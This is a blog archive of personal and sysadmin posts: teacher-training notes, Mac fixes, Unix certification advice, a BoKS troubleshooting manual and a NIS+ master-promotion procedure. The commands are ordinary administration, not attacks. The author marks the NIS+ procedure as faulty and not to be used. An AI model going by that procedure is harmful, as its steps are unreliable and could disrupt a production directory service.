View or add comments (curr. 1)

Tips for Microsoft Office

2008-03-07 00:03:00

Generating a table of contents

A few of my classmates have asked me questions about creating a table of contents in their Word documents. Most of my classmates appear to be creating their TOCs manually, by copying each chapter's title and adding a page number after it. Of course this manual process is prone to errors and it also takes up a lot of time. Every time that you make a change to the layout of your document, you'll have to completely redo the TOC.

Luckily, MS Word (and most other word processors) are capable of automatically generating a TOC for you! The clip below shows you how to do it.

The clip weighs in at 29MB, so it will take a little while to load.

TableContentsHOWTO.mov

Inserting pictures into your document

Another thing my classmates have asked me about, is how to insert pictures into their documents. The following clip (about 26MB) will show you the whole process.

WordPicturesHOWTO.mov


kilala.nl tags: , ,

View or add comments (curr. 0)

Interesting debate on work ethics

2008-02-23 15:55:00

Here's an interesting question for you: if we want our kids/students to put in effort in their work, why don't we do the same? Isn't that a bit two-faced?

Case in point: my own studies. It's been suggested a few times that I'm working myself into my grave at school, by putting so much effort into each and every assignment and report.

It's true that, for most of my reports, I put in extra research that isn't needed. Without said research I feel that I'm doing a half-assed job, because I wouldn't completely understand the subject matter. I enjoy studying extra materials from a field that I'm only in the process of entering, because without them I feel less confident. I've even been complimented on my efforts by a teacher or two.

However, now people (both teachers and fellow students) are suggesting that I could save a lot of time by skipping all that research. "Just find the answers to the questions and move on." "Don't bother with all those nice looking reports." "Do you really think someone's going to read a 25 page paper every time you submit one?"

Now, I'm not disregarding their suggestions, because it's certainly true that I could do with a little spare time. Too much work and no play and all that. So yes, I will start accepting 60-70% as a good score as well.

However, the problem I have with all of this is that we would -love- to have our students go apeshit over their course material! We'dn love it if they got totally enthused about maths, or english lit, or PE. So why are we so quick to jump to the "easy road" ourselves? That just feels illogical to me and actually a little bit like a betrayal as well.


kilala.nl tags: , ,

View or add comments (curr. 1)

A summary of "Identiteitsontwikkeling en leerlingbegeleiding"

2008-02-16 21:05:00

As I've said, one of the killer first year's courses is Kijk op leerlingen en leren. Aside from a number of term papers and research that need to be done, there's also a big exam.

This exam presents the students with a number of cases that they need to assess using the experience they've gained throughout the course. During the exam, students are allowed to refer to the course book, Identiteitsontwikkeling en leerlingbegeleiding by van der Wal, de Mooij and de Wilde.

Below, you'll find my summary of four of the book's chapters. I didn't have time to tackle the chapter on the development of intelligence.

My summary is compiled as a 50+ .PDF document. You can download my summary here.


kilala.nl tags: , , ,

View or add comments (curr. 0)

All my term papers on Student Identity Development

2008-02-16 20:52:00

One of the killer courses in the first year of the teachers education at Hogeschool Utrecht is Kijk op leerlingen en leren. This course has a twofold focus and is tested in three seperate ways. The two main subjects of this course are identity development in students and a new approach to teaching known as The New Learning (Het Nieuwe Leren).

Testing is done as follows:

  1. An exam on identity development in teens.
  2. Five term papers on identity development.
  3. A group project on Het Nieuwe Leren, with a bunch of papers as output.

To help prepare for the test, I've written a summary of the book that we used in class. The book in question is Identiteitsontwikkeling en leerlingbegeleiding by van der Wal, de Mooij and de Wilde. Here's the summary.

The page you're currently browsing features all of my term papers on identity development and all of the papers I wrote for the group project.



Dossier opdracht 1

As an introduction to this course all students are asked to look back at their own teenage years. They're asked to speak candidly about their days in high school, their sexual development and their identity as a teenager.

Since this document contains a lot of stuff that hits a bit too close to home, I won't be putting it up on my website.



Dossier opdracht 2

This paper contains a few assignments about chapter 2 from the course book. The chapter covers basic identity development, including the various influences that work on a teenager.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 3

This paper contains a few assignments about chapter 3 from the course book. The chapter covers the development of intelligence and learning processes.

I haven't done this one yet ^_^



Dossier opdracht 4

This paper contains a few assignments about chapter 4 from the course book. The chapter covers the sexual identity of teenagers and how they cope with the changes their body and mind go through.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 5

This paper contains a few assignments about chapter 5 from the course book. This chapter covers student guidance and counseling. It explains what to do with students who have learning problems, or various disabilities.

This document is available as a .PDF document and can be downloaded here.


Group project on The New Learning

The second, huge part of this project involved research into The New Learning, or Het Nieuwe Leren as it is known in the Netherlands. These "new" (or actually "reinvented") teaching methods have led to a lot of changes to the dutch educational system and as you can imagine it has led to a lot of fighting as well.

Our group of four was asked to investigate various parts of Het Nieuwe Leren, including the didactical and historical backgrounds. We produced a number of documents, but you'll only find my own documents on this site.

The following documents are available for download:


kilala.nl tags: , , ,

View or add comments (curr. 0)

OS X 10.5.2 broke some stuff

2008-02-13 06:55:00

Well carp! It seems that going from 10.4.11 to 10.5.2 in one go has broken a few things on my Macbook. Most notably, my FileVault home directory refuses to mount D:

Checking things out with fsck and Disk Utility Provides the following:

Checking catalog file.

Invalid key length.

Volume check failed.

Disk verification failed.

Ouch. Luckily the encrypted sparseimage will still mount, so I'm using rsync to copy all of my data out of the home directory. Thank Dog I have an external FW disk lying around. Also thank Dog that I make a backup recently :)

Remember kids! Always make backups!

Also, it seems that the tablet driver for my Wacom Graphire4 is incompatible with 10.5.2 as well. It was working nicely with 10.5.1, but not it's borked out :( I guess I'll have to wait for an updated version.

Oh well... While my Macbook is copying all of my data, I'll go have breakfast.


kilala.nl tags: , , ,

View or add comments (curr. 0)

I taught my first class today

2008-02-07 15:50:00

The Cals College in IJsselstein

Oh. My. God. I was so nervous this morning, it's unbelievable!

This morning I headed over to the Cals College in IJsselstein, to teach a class for the first time ever-ever. Before that, I had an appointment with the school's student care coordinator, to discuss another school assignment. Fifteen minutes before my class, I was in pretty bad shape though. Crampy stomach, cold and clammy: also known as "nervous".

The same went for the first two minutes of my teaching: I had a shaky voice and kept losing track of my story. After that though, things were fine :)

The students in my classroom were nothing short of awesome. Just like my classmate had predicted, they were very kind ^_^ They were very attentive and they were fast on the uptake. They all managed to finish the whole stencil of assignments, with only a few making minor mistakes. I couldn't have wished for a better class.

<dutch>

Klas 1DLW, heel erg bedankt voor vandaag! Ik ben heel erg blij met hoe het is gegaan en had geen betere klas kunnen vragen voor mijn eerste les. Heel veel succes nog met school en misschien tot ziens :)

</dutch>

One point of important feedback that Gineke gave me: at this level of education, the questions I ask to verify the students' learning process are too open. Instead of asking if everyone gets it, I should ask more closed questions to see if people give the correct answers. Were this VWO instead of VMO (uni-prep as opposed to vocational school), -then- I could've asked open questions.

Of course, there was more feedback, but I'll put that in my report for school. This will be published in the School section in a few days.

Here's a snippet from the videotape I made for my portfolio.

NegGetal.mov


kilala.nl tags: , , ,

View or add comments (curr. 9)

A sneak peek into my class

2008-02-05 22:36:00

Here's a little taster of the stuff I'll be using in Thursday's math class. I'll be introducing the kids in a VMBO-BL class to the notion of negative numbers, which can be quite a challenge. I mean, how the heck do you explain to a twelve year old that there's something smaller than zero?

Of course, people will immediately point out things like temperatures, debt and years B.C. Thing is, those are only examples of negative numbers and they don't explain how or why. They just show that it's possible, but a child may not instinctively understand how these figures work.

So, this should prove to be interesting! The picture shown above is part of a stencil I'm putting together for the students. It's part of the first assignment they'll be making, pointing out the height at which various objects reside. I'm very curious about how it'll work out :)


kilala.nl tags: , , , ,

View or add comments (curr. 2)

Our kids don't need to learn fractions

2008-02-02 08:41:00

Or apparently that's what prof. DeTurck of Penssylvania-U thinks.

DeTurck does not want to abolish the teaching of fractions and long division altogether. He believes fractions are important for high-level mathematics and scientific research. But it could be that the study of fractions should be delayed until it can be understood, perhaps after a student learns calculus, he said. Long division has its uses, too, but maybe it doesn't need to be taught as intensely.

From:

USA Today

and

Good math, bad math

Of course, like many others I believe this notion to be nuts. Decimals have no meaning unless you know what fractions are. It'll be like handing a bunch of powertools to a carpenters apprentice and asking him to build a house. Oh, you don't need to know what everything does, just get to work...

As a future maths teacher I'm scared by this idea. And it's not just limited to the US. A dutch prof by the name of Kees Hoogland shares DeTurck's opinion that kids should be learning less longhand maths and should instead be focusing on using the calculator. Why? Because they'd be stupid not to use the modern materials at their disposal. *sigh*

I've started a forum discussion about this, over at Ars. Obviously, it's gotten some pissed off responses ^_^

EDIT:

In response to my thread over at Ars, GwT has started a new thread asking how important math is in general.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

It's finally going to happen!

2008-01-30 18:05:00

Well, it's finally going to happen! I've been putting this off for a long while, but Marli kicked me hard enough to get over it.

I'm going to teach a class.

The very thought still makes my stomach do somersaults, it's silly really. This is exactly what I'm studying for, so I ought to be longing for this moment! Of course, I realize that stage freight is something completely natural, but to be putting it off for months on end is just stupid. But now it's going to happen! In part because Marli got me out of my rut and in part because I'll fail my VAKDID2 class if I don't D:

My classmate Gineke is giving me a huge break, but letting me teach this class to one of her first year's groups. She tells me their absolute sweethearts, so I really have nothing to worry about.

In a week's time (OMG!DEADLINE!) I'll be introducing a group of first year's students to the concept of negative numbers. On the one hand this deadline's great, since it's putting some real pressure on me. On the other it's a bit scary, because I really have to push myself hard to make it.

I'm going to teach a class.

My very first time, in front of a room filled with youngsters that -aren't- there to listen to me talk about anime or Japan. My very first time, trying to educate the young. My very first time, making my career switch more real than it ever was! This is why I've been working my ass off the past few months. I need to remember to enjoy the experience and not just try to be perfect.

I'm going to teach a class.

Oh my!..


kilala.nl tags: , ,

View or add comments (curr. 6)

Closing the second semester

2008-01-23 10:14:00

So, the second semester has come and gone.

I've taken the only test on my list and I think it went fairly well. Unfortunately I'm well behind on my reports, meaning that I'll had to finish two courses next semester. Because of that, I've chosen to only follow one new course, which should give me enough free time to tie off any loose ends.

Luckily I've gotten some of my drive and energy back, so I'm motivated to keep going. Also, my EVE trial account will run out in a few days, so I'll be safe from that distraction as well. I -will- be getting a full account some day though. It really is an awesome game.


kilala.nl tags: ,

View or add comments (curr. 0)

Wacom Graphire4 tablet having driver troubles in Leopard

2008-01-21 12:04:00

Ever since I upgraded my Powermac to Leopard it'd been having problems with my Wacom Graphire4 tablet. The tablet would work, but only in its very basic mode. I suspected driver issues, but couldn't figure out which driver to use.

I finally got it to work though. Here's how:

1. If you have a directory called "Pen Tablet" or "Wacom" in /Applications, go in there and run the uninstaller. Remove both the prefs and the software.

2. Go into /Library/Preferences and remove all mentions of "Wacom" or "Pen Tablet".

3. Go into /Library/Application Support and do the same.

4. Go into ~/Library/Preferences and do the same.

5. For good measure, use the Find function in Finder to search for other mentions of Wacom.

6. Download the proper driver over here.

7. Install the new driver.

It should work now :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

iPhoto, not without its glitches

2008-01-14 09:56:00

Meh... iPhoto is not without its bugs, unfortunately. I'm busy copying a few gigs of pics from Japan to my Powermac. iPhoto keeps borking up the exports, saying that a number of files are locked due to activity. This lock appears to be taken away, once I give iPhoto the command to "revert to original" for the pics in question. It seems that the editing process in iPhoto doesn't always clean up its crap :/

This bug's changed a process that should've taken fifteen minutes into an hour's endeavour.


kilala.nl tags: , ,

View or add comments (curr. 0)

Certification tips for Unix sysadmins

2008-01-01 00:00:00

It takes at least a couple of years for a fledgling sys admin to build up his or her experience to a level where people will say: "Yeah! He's a good sysadmin.. He knows his way around the OS."

Most of the time of your first two or three years (assuming that you start admining in college) will be spent either with your nose in the books (learning new stuff) or with your nose to the grind stone (practicing the new stuff). A lot of time will be spent on basic grunt work, combined with maybe a couple of nice projects and some programming. But at some point in time a dreaded new word will drop on you like a brick from up on high... Management level that is...

_certification_

At first official vendor certification may seem like a humongous task! Especially if you take a look at the requirements that the vendor publishes on its website and at the sheer volume of the prep-books available. I had the same problem! One day may Field Managers mentioned that official certificates would look good on my resume and that I should go order a book or two... Which I did... And I subsequently try to read three times over... And just could not get through...

You see, I made the fatal mistake of wanting to cram everything in my head before even setting a date for the exam. This gave me way too much slack, causing me to lose interest at least two times over. So, after a bit of coaching from one of my friends/colleagues I came to the following conclusion on how to prepare for certification.

1. Get some experience :) Don't try to get certified immediately after being introduced to a new OS.

2. Take a look at the vendor's requirements for the certificate. These are usually published on their website.

3. Order one, maybe two good study books. I've created a small list of which books are good and which ones should be avoided.

4. Make a rough guestimate on how long you'll think you'll take studying. Don't make this any longer than two months, else you'll simply lose interest.

5. Order an exam voucher from your vendor.

6. Schedule the exam.

7. Start studying.

There's also a couple of other things that can really help you get the knack of things, ensuring that you'll be absolutely ready for the exam:

* Ask your employer to provide a sandbox system: a simple, small server which you are free to tinker with, configure, play with and break. This is an invaluable study tool!

* Purchase an account for a practice exam website (or get your employer to pitch in). The guys at Unixporting.com provide damn good test exams for Solaris Sysadmin 1 and 2, at a low price!

Most important of all: don't sweat it! A little excitement or a couple of shivers are good, but honestly: the fate of the world does not lean on your shoulders. If you don't make the exame, try, try try and try again. :)

Good luck!


kilala.nl tags: , , , , ,

View or add comments (curr. 3)

Recommended Unix Sysadmin books

2008-01-01 00:00:00

When getting certified, one of the most important tools are your cram sessions. With books.. You know: dead trees? treeware? those big leafy things which you read?... But you gotta know which ones are good and which ones to avoid like the plague.

Sun Solaris SCSA 1 and 2

"Exam cram: Solaris 8 System Administrator" ~ Darrell L. Ambro, Coriolis press

478 pages, comes with seperate cram sheet with "everything you need to know for the exam".



Avoid this one. This is the book it bought at first as it got some good reviews at Amazon.com. It was also the one that I tried getting through three times over *ugh* Honestly, the book is written in a very dull style but worst of all: it really isn't that much of a cram book since the author misses almost all of the important stuff for the exams. Way too little detail, so I wouldn't recommend it to anyone, but the starting Solaris sysadmin who needs to find a start.

"Solaris: Sun Certified System Administrator for Solaris 8.0 study guide" ~ Global Knowledge, Osborne McGraw-Hill

892 pages, comes with CD containing practice exams and a digital copy of the book.



Now _this_ is what I'm talking about! My colleague Martijn recommended this book and it really _does_ cover everything you need to know to ace the exame, plus a little more. The authors don't brush over any subject and take on each and every topic in detail. Yes, it's a big book and it may take you a while to get through it, but it's worth it. The exames included on the CD are a bit dodgy and are only good for one, maybe two attempts. In any case I recommend that you go out and get an account for a trial exame site.

Sun SCNA (TCP/IP Network admin)

"Sun certified network administrator for Solaris 8 study guide" ~ Rick Bushnell, Sun Microsystems Press

462 pages, no extras



Martijn also tipped me off about this book; apparently he aced the test with this book. I have to admit that the book _does_ take its time in explaining everything to you and that Rick doesn't leave out any details. I have to warn you though that the author also made a couple of mistakes, that he likes repetition (sometimes a little too much) and that at times he underestimates the exame (tells you that you don't need to know what he's about to explain, when you do). All in all a good book, but I'm not too crazy about it.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

LPI-101 summary

2008-01-01 00:00:00

In 2007 I got my LPI-1 certification. This certificate requires one to take two exams: LPI-101 and LPI-102. I've studied hard for both exams and created summaries of all of the stuff I had to learn. I thought I'd share my summaries with all of the other LPI students. I hope they are useful to you!


kilala.nl tags: , , , , ,

View or add comments (curr. 1)

SCNA summary

2008-01-01 00:00:00

Back in 2004, when I originally studied for my SCNA certification, I wrote a big summary based on the course books. I thought I'd share this summary with the rest of this world's students. Even though it was meant for the Solaris 8 SCNA exam, it should still be useful.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

LPI-102 summary

2008-01-01 00:00:00

In 2007 I got my LPI-1 certification. This certificate requires one to take two exams: LPI-101 and LPI-102. I've studied hard for both exams and created summaries of all of the stuff I had to learn. I thought I'd share my summaries with all of the other LPI students. I hope they are useful to you!


kilala.nl tags: , , , , ,

View or add comments (curr. 5)

Troubleshooting BoKS fault situations

2008-01-01 00:00:00

A PDF version of this document is available. Get it over here.

1.1.Verifying the proper functioning of a BoKS client

People have often asked me how one can check of a newly installed BoKS client is functioning

properly. With these three easy steps you too can become a milliona..!!.... Oops... Wrong show!

These easy steps will show you whether your new client is working like it should.

  1. Check the boks_errlog in $BOKS_var.
  2. Run cadm –l –f bcastaddr –h $client from the BoKS master (in a BoKS shell).
  3. Try to login to the new client.

If all three steps go through without error your systems is as healthy as a very healthy good

thing... or something.

1.2.SCENARIO: The BoKS master is not replicating to a replica (or all replicas)

Since on or more of the replicas is/are out of sync login attempts by users may fail, assuming that

the BoKS client on the server in question was looking at the out-of-sync BoKS replica. Other

nasty stuff may also occur.

Standard procedure is to follow these steps:

  1. Check the status of all BoKS replicas.
  2. Check BoKS error logs on the master and the replica(s).
  3. Try a forced database download.
  4. Check BoKS replication processes to see if they are all running.
  5. Check the master queue, using the boksdiag fque –master command.
  6. Check BoKS communications, using the cadm command.
  7. Check node keys.
  8. Check the replica server’s definition on BoKS database.
  9. Check the BoKS configuration on the replica.
  10. Debug replication processes.

All commands are run in a BoKS shell, on the master server unless specified otherwise.

1. Check the status of all BoKS replicas.

# /opt/boksm/sbin/boksadm –S boksdiag list

Since last pckt

The amount of minutes/seconds since the BoKS master

last sent a communication packet to the respective

replica server. This amount should never exceed more

than a couple of minutes.

Since last fail

The amount of days/hours/minutes since the BoKS

master was last unable to update the database on the

respective replica server. If an amount of a couple of

hours is listed you’ll know that the replica server had a

recent failure.

Since last sync

Shows the amount of days/hours/minutes since BoKS last

sent a database update to the respective replica server.

Last status

Yes indeed! The last known status of the replica server in

question. OK means that the server is running perfectly

and that updates are received. Loading means that the

server was just restarted and is still loading the database

or any updates. Down indicates that the replica server is

down or even dead.

2. Check BoKS error logs on the master and the replica(s).

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the

master and the replicas to see if you can detect any errors there. If the log file doesn’t mention

something about the hosts involved you should be able to find the cause of the problem pretty

quickly.

3. Try a forced database download.

Keon> boksdiag download –force $hostname

This will push a database update to the replica. Perform another boksdiag list to see if it

worked. Re-read the BoKS error log file to see if things have cleared up.

4. Check BoKS replication processes to see if they are all running.

Keon> ps –ef | grep –i drainmast

This should show two drainmast processes running. If there aren’t you should see errors about

this in the error logs and in Tivoli.

Keon> Boot –k

Keon> ps –ef | grep –i boks (kill any remaining BoKS processes)

Keon> Boot

Check to see if the two drainmast processes stay up. Keep checking for at least two minutes. If

one of them crashes again, try the following:

Check to see that /opt/boksm/lib/boks_drainmast is still linked to boks_drainmast_d, which

should be in the same directory. Also check to see that boks_drainmast_d is still the same file as

boks_drainmast_d.nonstripped.

If it isn’t, copy boks_drainmast_d to boks_drainmast_d.orig and then copy the non-stripped

version over the boks_drainmast_d. This will allow you to create a core file which is useful to TFS

Technology.

Keon> Boot –k

Keon> Boot

Keon> ls –al /core

Check that the core file was just created by boks_drainmast_d.

Keon> Boot –k

Keon> cd /var/opt/boksm/data

Keon> tar –cvf masterspool.tar master_spool

Keon> rm master_spool/*

Keon> Boot

Things should now be back to normal. Send both the tar file and the core file to TFS Technology

(support@tfstech.com).

5. Check the master queue.

Keon> boksdiag fque –master

If any messages are stuck there is most likely still something wrong with the drainmast processes.

You may want to try and reboot the BoKS master software. Do NOT reboot the master server!

Reboot the software using the Boot command. If that doesn’t help, perform the troubleshooting

tips from step 4.

6. Check BoKS communications, using the cadm command.

Verify that the BoKS communication between the master and the replica itself is up and running.

Keon> cadm –l –f bcastaddr –h $replica.

If this doesn’t work, re-check the error logs on the client and proceed with step 7.

7. Check node keys.

On the replica system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn’t return the configuration for the replica server, the keys have become

unsynchronized. If you make any changes you will need to restart the BoKS processes, using the

Boot command.

8. Check the replica server’s definition on BoKS database.

Keon> dumpbase | grep RNAME | grep $replica

The TYPE field in the definition of the replica should be set to 261. Anything else is wrong, so you

need to update the configuration in the BoKS database. Either that or have SecOPS do it for you.

9. Check the BoKS configuration on the replica.

On the replica system, review the settings in /etc/opt/boksm/ENV.

10. Debug replication processes.

If all of the above fails you should really get cracking with the debugger. Refer to the appropriate

chapter of this manual for details.

1.3.SCENARIO: You can’t log in to a BoKS client

Most obviously we can’t do our work on that particular server and neither can our customers.

Naturally this is something that needs to be fixed quite urgently!

  1. Check BoKS transaction log.
  2. Check if you can log in.
  3. Check BoKS communications
  4. Check bcastaddr and bremotever files.
  5. Check BoKS port number.
  6. Check node keys
  7. Check BoKS error logs.
  8. Debug servc process on replica server or relevant process on client.

All commands are run in a BoKS shell, on the master server unless specified otherwise.

1. Check BoKS transaction log.

Keon> cd /var/opt/boksm/data

Keon> grep $user LOG | bkslog –f - -wn

This should give you enough output to ascertain why a certain user cannot login. If there is no

output at all, do the following:

Keon> cd /var/junkyard/bokslogs

Keon> for file in `ls –lrt | tail –5 | awk ‘{print $9}’`

> do

> grep $user $file | bkslog –f - -wn

> done

If this doesn’t provide any output, perform step 2 as well to see if us sys admins can login.

2. Check if you can log in.

Pretty self-explanatory, isn’t it? Try if you can log in yourself.

3. Check BoKS communications

Keon> cadm –l –f bcastaddr –h $client

4. Check bcastaddr and bremotever files.

Login to the client through its console port.

Keon> cat /etc/opt/boksm/bcastaddr

Keon> cat /etc/opt/boksm/bremotever

These two files should match the same files on another working client. Do not use a replica or

master to compare the files. These are different over there. If you make any changes you will need

to restart the BoKS processes using the Boot command.

5. Check BoKS port number.

On the client and master run:

Keon> getent services boks

This should return the same value for the BoKS base port. If it doesn’t either check /etc/services

or NIS+. If you make any changes you will need to restart the BoKS processes using the Boot

command.

6. Check node keys

On the client system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn’t return the definition for the client server, the keys have become unsynchronized.

Reset them and restart the BoKS client software. If you make any changes you will need to restart

the BoKS processes using the Boot command.

7. Check BoKS error logs.

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the

master and the client to see if you can detect any errors there. If the log file doesn’t mention

something about the hosts involved you should be able to find the cause of the problem pretty

quickly.

8. Debug servc process on replica server or relevant process on client.

If all of the above fails you should really get cracking with the debugger. Refer to the appropriate

chapter of this manual for details (see chapter: SCENARIO: Setting a trace within BoKS)

NOTE: If you need to restart the BoKS software on the client without logging in, try doing so using a remote management tool, like Tivoli.

1.4 SCENARIO: The BoKS client queues are filling up

The whole of BoKS is still up and running and everything’s working perfectly. The only client(s)

that won’t work are the one(s) that have stuck queues. The only way you’ll find out about this is

by running boksdiag fque –bridge which reports all of the queues which are stuck.

  1. Check if client is up and running.
  2. Check BoKS communications.
  3. Check node keys.
  4. Check BoKS error logs.

All commands are run in a BoKS shell, on the master server unless specified otherwise.

1. Check if client is up and running.

Keon> ping $client

Also ask your colleagues to see if they’re working on the system. Maybe they’re performing

maintenance.

2. Check BoKS communications.

Keon> cadm –l –f bcastaddr –h $client

3. Check node keys.

On the client system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn’t return the definition for the client server, the keys have become unsynchronised.

Reset them and restart the BoKS client software using the Boot command.

4. Check BoKS error logs.

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the

master and the client to see if you can detect any errors there. If the log file doesn’t mention

something about the hosts involved you should be able to find the cause of the problem pretty

quickly.

NOTE: What can we do about it?

If you’re really desperate to get rid of the queue, do the following

Keon> boksdiag fque –bridge –delete $client-ip

At one point in time we thought it would be wise to manually delete

messages from the spool directories. Do not under any circumstance touch the

crypt_spool and master_spool directories in /var/opt/boksm. Really:

DON’T DO THIS! This is unnecessary and will lead to troubles with BoKS.

1.5 SCENARIO: Setting a trace within BoKS

We are required to run a BoKS debug trace when either:

  1. People are unable to login without any apparent reason. A debug will show why login are

    getting rejected.

  2. We have run into a bug or a problem with BoKS which cannot easily be dealt with through e-

    mail. TFS Tech support will usually request us to perform a number of traces and that we send

    them the output files..

First off, let me warn you: debug trace log files can grow pretty vast pretty fast! Make sure that

you turn on the trace only right before you’re ready to use the faulty part of BoKS and also be

sure to stop the trace immediately once you’re done.

Now, before you can start a trace you will need to make sure that the BoKS client system only

performs transactions with one BoKS server. If you don’t you will have no way of knowing on

which server you should run the trace.

Login to the client system experiencing problems.

$ su –

# cd /etc/opt/boksm

# cp bcastaddr bcastaddr.orig

# vi bcastaddr

Edit the file in such a way that it only points to one of the available BoKS servers. Preferably a

BoKS replica. Please refrain from using the BoKS master server.

# /opt/boksm/sbin/boksadm –S Boot –k

# sleep 10; ps –ef | grep –i boks | awk '{print $2}' | xargs kill

# /opt/boksm/sbin/boksadm –S Boot

Now, how you proceed depends on what problems you are experiencing.

If people are having problems logging in:

Log in to the replica server and start Boks with sx.

# sx /opt/boksm/sbin/boksadm –S

# cd /var/tmp

Now, type the following command, but DO NOT press enter yet.

# bdebug –x 9 bridge_servc_r –f /var/tmp/BR-SERVC.trace

Open a new terminal window, because we will try to login to the failing client. BEFORE YOU

START THE TOOL USED TO LOGIN (SSH, Telnet, FTP, whatever) press enter at the command

waiting on the replica server. Attempt to login as usual. If it fails you have successfully set a trace.

Switch back to the window on the replica server and run the following command to stop the

trace.

# bdebug –x 0 bridge_servc_r

Repeat the same process once more, but this time around debug the servc process instead of

bridge_servc_r. Send the output to /var/tmp/SERVC.trace.

You can now read through the files /var/tmp/BR-SERVC.trace and /var/tmp/SERVC.trace to

troubleshoot the problem by your self, or you could send it to TFS Tech for analysis. If the

attempted login did NOT fail there’s something else going on: one of the other replica servers is

not working properly! Find out which one it is by changing the client’s bcastaddr file while every

time using a different BoKS server as a target.

If you are attempting to troubleshoot another kind of problem:

Tracing any other part of BoKS isn’t really altogether that different from tracing the login process.

You prepare in the same way (make bcastaddr point at one BoKS server) and you will probably

have to prepare the trace on bridge_servc_r as well (see the text block above; if you do not have

to trace bridge_servc_r TFS Tech will probably tell you so).

Yet again, BEFORE you start the trace on the master side by running

# bdebug –x 9 bridge_servc_r –f /var/tmp/SERVC.trace

You will have to go to the client system with the problematic situation and perform the following.

# cd /var/tmp

# bdebug –x 9 $PROG –f /var/tmp/$PROG.trace

$PROG in this case is the name of the BoKS process (bridge_servc_r, drainmast_download) or the

access method (login, su, sshd) that you want to debug.

Now, start both traces and attempt to perform the task that is failing. Once it has failed, stop

both traces again using bdebug –x 0 $PROG.

1.6 SCENARIO: Debugging the BoKS SSH daemon

From time to time you may have problems with the BoKS SSH daemon which cannot be explained

in any logical way. At such a time a debug trace of the SSH daemon can be very helpful! This can

be done by starting a second daemon on an unused port temporarily.

On the troubled system, login and start a BoKS shell:

# /opt/boksm/sbin/boksadm –S

Keon> boks_sshd –d –d –d –p 24 /tmp/sshd.out 2>&1

From another system:

$ ssh –l $username -p24 $target-host

Try logging in; it shouldn’t work :) Now close the SSH session with Ctrl-C, which should also

close the temporary SSH daemon on port 24. /tmp/sshd.out should now contain all of the

debugging information you or TFS Technology could need.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Promoting NIS+ replicas into master servers

2008-01-01 00:00:00

EDIT: 23/11/2004

DO NOT USE THE FOLLOWING PROCEDURE! IT HAS PROVEN TO BE FAULTY AND SHOULD ONLY BE USED AS A GUIDELINE FOR MAKING YOUR OWN PROCEDURE!

I will try and correct all of the mistakes as soon as possible.. Please be patient...

At some point in time it may happen that your NIS+ master server has become too old or overloaded to function properly. Maybe you used old decrepid hardware to begin with, or maybe you have been using NIS+ in your organisation for ages :) Anywho, you've now reached the point where the new hardware has received its proper build and that the server is ready to assume its role as NIS+.

Of course you want things to go smoothly and with as little downtime as possible. Of course one of the methods to go about this is about to use the other procedure in this menu: "Rebuild your master". That way you'll literally build a new master server after which you reload all of the database contents from raw ASCII dumps.

The other method would be by using the procedure below :) This way you'll transfer mastership of all your NIS+ database from the current master to the new one. I must admit that I haven't used this procedure in our production environment as of yet (15/11/04), but I will in about a week! But even after that time, after I've added alterations and after I've fixed any errors, don't come sueing me because the procedure didn't work for you. NIS+ can be a fickle little bitch if she really wants to...


This procedure requires that your new NIS+ master server is already a replica server. There are numerous books and procedures on the web which describe how to promote a NIS+ client into a replica, but I'll include that procedure in the menu sometime soon.

Before you begin, disable replication of NIS+ on any other replica servers you may have running. This is easily done by killing the rpc.nisd process on each of these systems. Beware though that all of the replicas do need to remain functioning NIS+ clients! This ensures that their NIS_COLD_START gets updated.

Log in to both the current master and the replica server you wish to upgrade. Become root on both systems.

On the master server:

# for table in `nisls`

>do

>nismkdir -m $replica $table

>done

# cd /var/nis/data

# scp root.object $user@$replica:/tmp

On the replica server:

# cd /var/nis/data

# mv /tmp/root.object .

# chown root:root root.object

# chmod 644 root.object

Kill all NIS processes on both the master and the replica in question. Then restart on the replica using:

# /usr/sbin/rpc.nisd -S 0

# /usr/sbin/nis_cachemgr -i

Verify that the replica server is now recognised as the current master server by using the following commands.

# nisshowcache -v

# niscat -o groups_dir.`domainname`.

# niscat -o org_dir.`domainname`.

# niscat -o `domainname`.

If the replica system is not recognised as the master, re-run the for-loop which was described above. This will re-run the nismkdir command for each table that isn't configured properly.

# for table in `nisls`

>do

> nischown `hostname` $table.`domainname`.

> for subtable in `nisls $table | grep -v $table`

> do

> nischown `hostname` $subtable.$table

> done

>done

Once again verify the ownership of the tables which you just modified.

# niscat -o `domainname`.

# niscat -o passwd.org_dir

Checkpoint the whole NIS+ domain.

# for table in `nisls`

>do

>nisping -C $table

>done

Kill all NIS+ daemons on the new master. Then restart using:

# /usr/sbin/rpc.nisd

# /usr/sbin/nis_cachemgr -i

Currently the old master has reverted to replica status. If you want to remove the old master from the infrastructure as a server, proceed with the next section.


Login to both the new master and the old master. Become root on both.

On the new master:

# for table in `nisls`

>do

>nisrmdir -s $oldmaster $table

>done

Checkpoint the whole NIS+ domain.

# for table in `nisls`

>do

>nisping -C $table

>done

Now make the old NIS+ master a client system.

# rm -rf /var/nis

# /usr/sbin/rpc.nisd

# nisinit -c -H $newmaster

# nisclient -i -d `domainname` -h $newmaster


kilala.nl tags: , , ,

View or add comments (curr. 0)

Combining net-SNMP and SUNWmasf on Solaris

2008-01-01 00:00:00

In some cases you're going to want to use Net-SNMP on your Solaris hosts, while still being able to monitor Sun-specific SNMP objects. It took me a while to get all of this to work and it's a bit of a puzzle, but here's how to make it work.

In our current environment at $CLIENT we want to standardise all of our UNIX hosts to the Net-SNMP agent software. This will allow us to use a configuration file which can be at least 60% identical on each host, making life just a little bit easier for all of us. Unfortunately Net-SNMP isn't equipped to deal with all of Sun's specific SNMP objects, so we're going to have to make a few big modifications to the software.

